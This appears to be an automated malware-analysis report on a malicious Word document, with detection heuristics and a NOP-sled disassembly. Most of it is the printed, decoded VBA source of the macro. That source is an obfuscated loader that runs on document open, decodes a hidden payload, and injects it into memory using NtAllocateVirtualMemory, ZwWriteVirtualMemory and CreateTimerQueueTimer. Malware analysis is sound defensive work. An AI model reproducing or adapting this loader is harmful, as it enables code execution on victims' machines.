MALICIOUS
110
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Doc.Downloader.Macro-6539595-0, indicating it's a macro-based downloader. The presence of a Document_Open macro and embedded VBA code strongly suggests the intent to execute malicious code upon opening. The VBA script, though obfuscated, likely attempts to download and run a secondary payload, a common tactic for this type of malware.
Heuristics 5
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x40 bytes
Disassembly
Attempted x86 opcode disassembly0000180D 40 inc eax 0000180E 40 inc eax 0000180F 40 inc eax 00001810 40 inc eax 00001811 40 inc eax 00001812 40 inc eax 00001813 40 inc eax 00001814 40 inc eax 00001815 40 inc eax 00001816 40 inc eax 00001817 40 inc eax 00001818 40 inc eax 00001819 40 inc eax 0000181A 40 inc eax 0000181B 40 inc eax 0000181C 40 inc eax 0000181D 40 inc eax 0000181E 40 inc eax 0000181F 40 inc eax 00001820 40 inc eax 00001821 40 inc eax 00001822 40 inc eax 00001823 40 inc eax 00001824 40 inc eax 00001825 40 inc eax 00001826 40 inc eax 00001827 40 inc eax 00001828 40 inc eax 00001829 40 inc eax 0000182A 40 inc eax 0000182B 40 inc eax 0000182C 40 inc eax 0000182D 40 inc eax 0000182E 40 inc eax 0000182F 40 inc eax 00001830 40 inc eax 00001831 40 inc eax 00001832 40 inc eax 00001833 40 inc eax 00001834 40 inc eax 00001835 40 inc eax 00001836 40 inc eax 00001837 40 inc eax 00001838 40 inc eax 00001839 40 inc eax 0000183A 40 inc eax 0000183B 40 inc eax 0000183C 40 inc eax 0000183D 40 inc eax 0000183E 40 inc eax 0000183F 40 inc eax 00001840 40 inc eax 00001841 40 inc eax 00001842 40 inc eax 00001843 40 inc eax 00001844 40 inc eax 00001845 40 inc eax 00001846 40 inc eax 00001847 40 inc eax 00001848 40 inc eax 00001849 40 inc eax 0000184A 40 inc eax 0000184B 40 inc eax 0000184C 40 inc eax 0000184D 40 inc eax 0000184E 40 inc eax 0000184F 40 inc eax 00001850 40 inc eax 00001851 40 inc eax 00001852 40 inc eax 00001853 40 inc eax 00001854 40 inc eax 00001855 40 inc eax 00001856 40 inc eax 00001857 40 inc eax 00001858 40 inc eax 00001859 40 inc eax 0000185A 40 inc eax 0000185B 40 inc eax 0000185C 40 inc eax 0000185D 40 inc eax 0000185E 40 inc eax 0000185F 40 inc eax 00001860 40 inc eax 00001861 40 inc eax 00001862 40 inc eax 00001863 40 inc eax 00001864 40 inc eax 00001865 40 inc eax 00001866 40 inc eax 00001867 40 inc eax 00001868 40 inc eax 00001869 40 inc eax 0000186A 40 inc eax 0000186B 40 inc eax 0000186C 40 inc eax
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() Dim milliradian As String -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13810 bytes |
SHA-256: a03f6e9b6feac72667c7b0003ae98de513c56f220159c5c3791fd9b8da789fe2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub MyTestArray()
Dim myArray(1 To 4) As String ' Declaring array and setting bounds
Dim Response As String
Dim i As Integer
Dim myFlag As Boolean
myFlag = False
myArray(1) = "A"
myArray(2) = "B"
myArray(3) = "C"
myArray(4) = "D"
Do Until myFlag = True
Response = InputBox("Please enter your choice: (i.e. A,B,C or D)")
For i = 1 To 4
If UCase(Response) = UCase(myArray(i)) Then
myFlag = True: Exit For
End If
Next i
Loop
End Sub
Sub charronia()
Dim elongation As Long
Dim aft As Variant
dalmatia.convivial.Value = Day(#12/5/2013#)
varday = coagulate = susurrant
bay = dracunculus
lentor = "cairina"
blossoming = "asia"
nonequivalence = qucksands
functionalism = "agropyron"
windy = "infuse"
snob = "kibitka"
Set immesh = dalmatia.convivial.SelectedItem
cur = 30 + 20
Pmt 0, cur, 31994, 42250, 5
morceau = immesh.Name
adelgidae = 42 - 89 + 7891
lemures = Right(morceau, adelgidae)
lyricality = deckle.associationism(lemures)
anaglyphy = 6 + 35
Pmt 0, anaglyphy, 26684, 37632, 7
asclepiad = "evaluator"
#If (8 - 86 + 478 + 32 - 14 + 282) > ((47 - 35 + 308) - (30 - 48 + 558) * 1) And ((71 - 50 + 7) - (120 - 79 - 13)) * 2 < (Win64) Then
Dim blessed As String
Dim pharmacological As LongPtr
Dim connate As LongPtr
Dim quilck As Integer
#ElseIf (69 - 99 + 430 + 117 - 58 + 241) > ((77 - 10 + 253) - (23 - 41 + 558) * 1) And Not ((112 - 116 + 32) - (77 - 90 + 41)) * 2 < (Win64) Then
Dim moneybag As Byte
Dim connate As Long
Dim meshes As String
Dim pharmacological As Long
#End If
bomber = 121 - 46 - 75
ferociously = "certifiable"
annalistic = 44 - 12 + 4064
enology = 48 + 10
Pmt 0, enology, 6000, 59593, 3
briarwood = "scrambling"
bey = "retrospection"
mawworm = buckshee
casuarinaceae = 26 + 47
Pmt 0, casuarinaceae, 2847, 52052, 8
vadium = lyricality
diaphragm = "pettily"
pharmacological = amidst(vadium)
inclination = acrobatic
extrinsicality = "acheta"
#If (64 - 77 + 413 + 20 - 118 + 398) > ((114 - 47 + 253) - (27 - 114 + 627) * 1) And ((32 - 106 + 102) - (23 - 116 + 121)) * 2 < (Win64) Then
Dim consols As Byte
Dim disapproving As LongPtr
Dim pretense As LongPtr
Dim abbreviate As LongPtr
milliary = 55 - 90 + 2099
#ElseIf (23 - 1 + 378 + 73 - 53 + 280) > ((50 - 88 + 358) - (12 - 56 + 584) * 1) And Not ((124 - 67 - 29) - (117 - 127 + 38)) * 2 < (Win64) Then
Dim disapproving As Long
greenockite = 42 - 17 + 756
Dim pretense As Long
Dim abbreviate As Long
milliary = greenockite + 3459
#End If
Dim committeewoman As Variant
Dim oppositeness As Variant
disapproving = 36 - 15 - 21
connate = pharmacological + milliary
pretense = 108 - 21 + 201440
abbreviate = 58 - 71 + 3513
archenteron = headlike(pretense, disapproving, connate, disapproving, disapproving, disapproving, disapproving)
silicle = 8 + 12
Pmt 0, silicle, 34176, 40946, 8
End Sub
Private Sub Document_Open()
Dim milliradian As String
Dim pace As Integer
seventies = "barrage"
charronia
janissary = 20 + 2
Pmt 0, janissary, 36851, 50656, 4
End Sub
Function assyriology(anaphase, propitiation, illdisposed)
Dim botanic As Long
Dim parana As Byte
Dim parrotfish As LongPtr
Dim mastermind As LongPtr
Dim polaroid As LongPtr
Dim inquiringly As Byte
Dim enterprising As LongPtr
Dim beeswax As LongPtr
complicity = complicity And 58
mensongesfrench = erignathus
mastermind = anaphase
beeswax = illdisposed
seditions = Math.Round(315)
enterprising = propitiation
sanative = 31 + 13
Pmt 0, sanative, 17927, 41448, 5
seditions = Fix(418)
parrotfish = 100 - 22 - 79
callionymidae ByVal parrotfish, _
mastermind, _
enterprising, beeswax, _
polaroid
mensongesfrench = erignathus
End Function
Function amidst(athelstan)
Dim holster As String
Dim mendicity As String
Dim comparatively As String
Dim cornmeal As Variant
#If (46 - 44 + 398 + 95 - 7 + 212) > ((52 - 113 + 381) - (25 - 95 + 610) * 1) And ((76 - 71 + 23) - (43 - 13 - 2)) * 2 < (Win64) Then
Dim isogram As Integer
Dim greasewood As LongPtr
allograph = 11 - 20 + 17
Dim superbug As LongPtr
Dim eyespot As Integer
Dim auspicium As Integer
Dim chimera As LongPtr
Dim marches As String
bunion = VarPtr(greasewood)
odylic = assyriology(bunion, VarPtr(athelstan) + (2 - 111 + 117), allograph)
#ElseIf (17 - 77 + 460 + 74 - 52 + 278) > ((96 - 71 + 295) - (82 - 32 + 490) * 1) And Not ((9 - 16 + 35) - (62 - 9 - 25)) * 2 < (Win64) Then
Dim greasewood As Long
allograph = 10 - 45 + 39
Dim superbug As Long
Dim chimera As Long
bunion = VarPtr(greasewood)
odylic = attrition(bunion, VarPtr(athelstan) + (15 - 72 + 65), allograph)
#End If
donnybrook = 28 - 67 + 38
superbug = 44 - 59 + 15
darwinism = 53 - 62 + 9
chimera = 127 - 83 + 9374
plutocracy = 56 - 58 + 4098
overpayment = 108 - 77 + 33
delf = lessen(ByVal donnybrook, _
superbug, ByVal darwinism, chimera, ByVal plutocracy, _
ByVal overpayment)
seditions = Math.Round(185)
complicity = Rnd(313)
#If (40 - 18 + 378 + 25 - 127 + 402) > ((29 - 7 + 298) - (2 - 76 + 614) * 1) And ((22 - 107 + 113) - (83 - 103 + 48)) * 2 < (Win64) Then
incrassation = assyriology(superbug, greasewood, 108 - 83 + 5858)
#ElseIf (119 - 15 + 296 + 47 - 27 + 280) > ((112 - 114 + 322) - (8 - 17 + 549) * 1) And Not ((91 - 83 + 20) - (50 - 14 - 8)) * 2 < (Win64) Then
caliban = attrition(superbug, greasewood, 35 - 113 + 5961)
#End If
neohygrophorus = 60 + 7
Pmt 0, neohygrophorus, 13682, 12639, 5
amidst = superbug
End Function
Function attrition(hypermarket, theosophy, bushman)
Dim indefiniteness As Long
Dim argasidae As String
Dim macaw As Long
Dim epoch As String
Dim palmales As Long
Dim beret As Integer
Dim amitotic As Long
Dim grumous As Long
Dim patrol As Long
Dim interplanetary As Byte
Dim misocainea As Long
mensongesfrench = mensongesfrench
mensongesfrench = mensongesfrench
indefiniteness = hypermarket
patrol = bushman
erignathus = "lichenes"
palmales = theosophy
sugarloaf = 15 + 40
Pmt 0, sugarloaf, 6903, 50808, 2
complicity = Fix(179)
macaw = 43 - 49 + 5
callionymidae ByVal macaw, indefiniteness, palmales, patrol, amitotic
unrepining = seditions / 375
End Function
Attribute VB_Name = "deckle"
#If (117 - 114 + 397 + 103 - 102 + 299) > ((105 - 93 + 308) - (45 - 50 + 545) * 1) And ((67 - 21 - 18) - (117 - 58 - 31)) * 2 < (Win64) Then
Public Declare PtrSafe Function headlike _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (manubrium As Any, ByVal arbiter As Any, ByVal panhellenic As Any, ByVal primed As Any, ByVal avulso As Any, ByVal blessed As Any, ByVal loner As Any) As Long
Public Declare PtrSafe Function lessen _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (cushcush As LongPtr, erebus As LongPtr, ByVal annis As LongPtr,hydrasByVal As LongPtr, magsman As LongPtr, ByVal closeness As LongPtr) As LongPtr
Public Declare PtrSafe Function amphibolite _
Lib "Shlwapi " Alias _
"SleepConditionVariableSRW" (ByVal placement As Any, beating As Any, past As Any, oleandraceae As Any) As LongPtr
Public Declare PtrSafe Function grog _
Lib "ntdll " Alias _
"AcquireSRWLockShared" (burrlike As Any) As LongPtr
Public Declare PtrSafe Function ashcan _
Lib "Shlwapi " Alias _
"GetOverlappedResult" (ByVal biliary As Any, byre As Any, obsequious As Any, glissade As Any) As LongPtr
Public Declare PtrSafe Function callionymidae _
Lib "ntdll " Alias _
"ZwWriteVirtualMemory" (ByVal caesura As Any, ByVal ginger As Any, ByVal coreference As Any, ByVal akin As Any, ByVal fieriness As Any) As LongPtr
#ElseIf (120 - 84 + 364 + 27 - 69 + 342) > ((63 - 93 + 350) - (22 - 74 + 592) * 1) And Not ((120 - 108 + 16) - (62 - 25 - 9)) * 2 < (Win64) Then
Public Declare Function headlike _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (mounting As Any, ByVal trouvere As Any, ByVal catachrestic As Any, ByVal describe As Any, ByVal abstract As Any, ByVal biflagellate As Any, ByVal bisquit As Any) As Long
Public Declare Function oleandra _
Lib "ntdll " Alias _
"AcquireSRWLockShared" (seeking As Any) As Long
Public Declare Function callionymidae _
Lib "ntdll " Alias _
"ZwWriteVirtualMemory" (ByVal effortlessly As Any, ByVal protoplasm As Any, ByVal crustose As Any, ByVal carthusian As Any, ByVal compensation As Any) As Long
Public Declare Function boatswain _
Lib "Shlwapi " Alias _
"GetOverlappedResult" (ByVal cusp As Any, lens As Any, superannuated As Any, shorn As Any) As Long
Public Declare Function hideaway _
Lib "Shlwapi " Alias _
"SleepConditionVariableSRW" (ByVal dad As Any, spectrometric As Any, betulaceous As Any, duplicature As Any) As Long
Public Declare Function lessen _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (geotropism As Long, lubricity As Long, ByVal discontentment As Long, hypoactiveByVal As Long, regulate As Long, ByVal missile As Long) As Long
#End If
Function associationism(strawboard) As String
Dim scours As Long
Dim telephotography As String
complicity = Math.Round(227)
Dim sociologically As Long
Dim abnormalize(6962) As Byte
Dim chyle As Long
Dim chrism() As Byte
Dim chorizagrotis(63) As Long
Dim brat As Integer
Dim macaire(63) As Long
Dim gentlemanly As Long
Dim currishly(63) As Long
endlessly = 34 - 36 + 16711682
whiffletree = 100 - 35 - 1
Dim bel As Variant
bloodyminded = 86 - 72 + 4082
bazeingr = 57 - 40 + 65519
jhuth = 91 - 91 + 262144
cashew = 22 - 71 + 258097
vesalius = 3 - 106 + 166
been = 106 - 24 + 16514990
Dim fidus As Byte
nati = 99 - 20 + 177
prepubescent = 46 - 23 + 4009
Dim lightsomeness As Long
nozzle = 78 - 34 + 65236
corollary = 37 - 49 + 267
Dim sublimity As Long
delilah = 8 - 65 + 7900
Dim abrasion() As Byte
abrasion = VBA.StrConv(strawboard, 120 + 8)
paraboloid = 44 + 55
Pmt 0, paraboloid, 5934, 30053, 2
circularknit = 7843
madwoman = vbKeyShift - 12
For unaligned = 0 To circularknit
If unaligned Mod 2 = 0 Then
abrasion(unaligned) = abrasion(unaligned) - madwoman
Else
abrasion(unaligned) = abrasion(unaligned) - (madwoman - 1)
End If
Next unaligned
monistic = 24 + 6
Pmt 0, monistic, 19309, 35586, 7
brat = 0
amah = dynamite
For chyle = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
currishly(chyle) = churl(chyle, whiffletree, 49)
chorizagrotis(chyle) = churl(chyle, bloodyminded, 49)
macaire(chyle) = churl(chyle, jhuth, 49)
Next chyle
faithless = 31 + 2
Pmt 0, faithless, 4128, 38197, 6
chrism = abrasion
branchiopod = 76 - 94 + 22
bottomland = 45 + 24
Pmt 0, bottomland, 9912, 41348, 8
backhand = 73 - 88 + 18
unrepining = complicity - 177
mensongesfrench = erignathus
stares = backhand + 1
hyperborean = 11 - 39 + 30
For scours = 0 To circularknit
edible = chrism(scours)
balbriggan = chrism(scours + 2)
cloudy = chorizagrotis(amah(chrism(scours + 1)))
musketry = currishly(amah(balbriggan)) + amah(chrism(scours + backhand))
sociologically = macaire(amah(edible)) + cloudy + musketry
chyle = churl(sociologically, endlessly, 41)
abnormalize(gentlemanly) = churl(chyle, bazeingr, 31)
chyle = churl(sociologically, nozzle, 41)
abnormalize(gentlemanly + 1) = churl(chyle, nati, 31)
abnormalize(gentlemanly + hyperborean) = churl(sociologically, corollary, 41)
gentlemanly = gentlemanly + hyperborean + 1
scours = scours + 3
Next
associationism = abnormalize
End Function
Function hypotonic(chops)
hypotonic = AscW(chops)
End Function
Function dynamite()
Dim turfman(255) As Byte
microglia = 38 - 95 + 122
For i = microglia To (16 - 45 + 120)
turfman(microglia) = microglia - (62 - 84 + 87)
microglia = microglia + 1
If (76 - 88 + 103) < microglia Then
airmanship = camisole + 4 - 43 + 104
Exit For
End If
civile = elderberry + 27 - 29 + 67
Next
microglia = (76 - 124 + 96)
For i = microglia To (85 - 41 + 14)
turfman(microglia) = microglia + (104 - 90 - 10)
microglia = microglia + 1
If (53 - 102 + 107) < microglia Then
acariasis = optimism + 81 - 44 + 28
Exit For
End If
infamous = ungentle + 126 - 51 - 10
Next
microglia = (90 - 119 + 126)
For i = microglia To (20 - 46 + 149)
turfman(microglia) = microglia - (91 - 112 + 92)
microglia = microglia + 1
oneirocritic = bigamy + 14 - 14 + 65
If (63 - 35 + 95) < microglia Then
doublebedded = porousness + 99 - 111 + 77
Exit For
End If
beacon = orleanist + 118 - 106 + 53
Next
turfman(106 - 10 - 49) = (50 - 57 + 70)
microglia = (120 - 6 - 71)
turfman(microglia) = (60 - 121 + 123)
dynamite = turfman
End Function
Sub range()
Dim rngFirstList As range
Set rngFirstList = ActiveDocument.Lists(1).range
ActiveDocument.Windows(1).ScrollIntoView Obj:=rngFirstList, Start:=False
rngFirstList.Select
Selection.Collapse Direction:=wdCollapseEnd
Selection.MoveLeft Unit:=wdCharacter, Count:=1, Extend:=wdMove
End Sub
Function churl(sedativehypnotic, chine, disused)
Select Case disused
Case 31 + (10 / 2 - 5)
churl = sedativehypnotic \ chine
Case 41 + (5 - 3) / 2 - 1
churl = sedativehypnotic And chine
Case 49 + (56 / 7 - 4 * 2)
churl = sedativehypnotic * chine
End Select
End Function
Attribute VB_Name = "dalmatia"
Attribute VB_Base = "0{AB6DF160-CB04-4CB3-9A5A-F90DCC2FC2B7}{101CE94B-4C91-4B50-A705-BD3E3EF1583D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.